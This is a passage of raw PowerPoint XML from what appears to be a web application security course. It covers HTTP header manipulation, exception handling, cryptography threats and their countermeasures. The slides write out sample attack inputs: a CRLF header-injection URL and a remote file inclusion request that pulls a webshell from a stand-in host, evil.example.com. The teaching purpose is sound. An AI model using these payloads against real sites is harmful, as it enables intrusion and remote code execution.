                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/page1%0d%0aLocation:vulnweb.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stored HTTP header injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>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28780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Parameter Manipulation …</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HTTP Header Manipulation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Countermeasures:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do not base your security decisions on HTTP headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Properly sanitize values in the `Location` header. Filter characters such as \r and \n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200"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5" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59EA4009-3D7C-912A-35DC-5CFAA1D7A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45770"/>
            <a:ext cx="5224584" cy="27516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C86E5-71A1-9620-A80F-2AE2113AEE0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5684520" y="2601645"/>
            <a:ext cx="6474264" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252734"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Alegreya"/>
              </a:rPr>
              <a:t>carriage return (\r) and a line feed (\n), also abbreviated as CRLF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28176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56A9A-31AE-EC9E-6781-800A8C8376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Web Application: Design Issues</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{155347F6-6D71-80A5-7344-DEB988AAAEBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4475606" y="768432"/>
            <a:ext cx="7341490" cy="5758692"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409938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Exception Management</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a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Exceptions that are allowed to propagate to the client can reveal internal implementation details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>make no sense to the end user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>useful to attackers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Top exception handling threats:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker reveals implementation details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Denial of service </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20345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Exception Management</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200" b="1" dirty="0"/>
              <a:t>Attacker Reveals Implementation Details </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>type of information that could be returned includes platform versions, server names, SQL command strings, and database connection strings</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5124" name="Picture 4" descr="The Yellow Screen of Death">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A963F53-84B6-0E54-EA41-009CD6687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240" y="2824550"/>
            <a:ext cx="4613910" cy="4033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B327F3-866E-46CA-60A8-5A78260075AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7574280" y="5780821"/>
            <a:ext cx="4613910" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Troy Hunt: OWASP Top 10 for .NET developers part 6: Security Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183485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Exception Management</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200" b="1" dirty="0"/>
              <a:t>Attacker Reveals Implementation Details </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Countermeasures:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use structured exception handling throughout your application’s code base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do not log sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Handle and log exceptions that are allowed to propagate to the application boundary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Return generic, harmless error messages to the client</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94753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Exception Management</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Denial of Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Attackers will probe a Web application, usually by passing deliberately malformed input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>cause exceptions that reveal useful information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>crash the Web application process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>if exceptions are not properly caught and handled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Countermeasures:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thoroughly validate all input data at the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use exception handling throughout your application’s code base</a:t>
            </a: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2736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94727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Cryptography</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sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (Confidentiality)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>- This service keeps a secret confidential. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Non-Repudiation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (Authenticity)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>- This service makes sure a user cannot deny sending a particular message. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tamperproofing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (Integrity). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>- This service prevents data from being altered. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>- This service confirms the identity of the sender of a message.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"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373710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0087-C8B1-FD7F-2A2C-BD82440343F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F3A376A-E34A-DFF2-3E0C-CCCDAE7AD8AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4667250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>: An application encrypts credit card numbers in a database using automatic database encryption. However, this data is automatically decrypted when retrieved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>allowing a SQL injection flaw to retrieve credit card numbers in clear text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>: A site doesn't use or enforce TLS for all pages or supports weak encryption. An attacker monitors network traffic (e.g., at an insecure wireless network), downgrades connections from HTTPS to HTTP, intercepts requests, and steals the user's session cookie. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>   attacker then replays this cookie and hijacks the user's (authenticated) session, accessing or modifying the user's private data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Scenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>: The password database uses unsalted or simple hashes to store everyone's passwords. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> A file upload flaw allows an attacker to retrieve the password database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>All the unsalted hashes can be exposed with a rainbow table of pre-calculated hashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Hashes generated by simple or fast hash functions may be cracked by GPUs, even if they were salted.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204658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9DB2-9099-4CB0-9989-4DECAF7EC302}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File Inclusion (example)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EA17328-43C8-6735-839A-B0865B4444A5}"/>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r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>vulnerable.php?language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=http://evil.example.com/webshell.txt? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injects a remotely hosted file containing a malicious code (remote file inclusion vulnerability)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>vulnerable.php?language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=C:\\ftp\\upload\\exploit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Executes code from an already uploaded file called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (local file inclusion vulnerability)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9B2CA99-17E0-BCA8-D886-69ACA2378209}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="365125"/>
            <a:ext cx="4996123" cy="3801123"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="392077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Cryptography</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a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>protect data and to ensure it remains private and unaltered</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Top threats surrounding your application’s use of cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Poor Key Generation or Key Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Weak or Custom Encryption </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Checksum Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400"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71151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Cryptography</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sz="2400" b="1" dirty="0"/>
              <a:t>Poor Key Generation or Key Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Countermeasures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use built-in encryption routines that include secure key management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use strong random key generation functions and store the key in a restricted location</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encrypt the encryption key for added security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Expire keys regularly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use the correct algorithm and correct key size</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1"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296629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Cryptography</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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Weak or Custom Encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
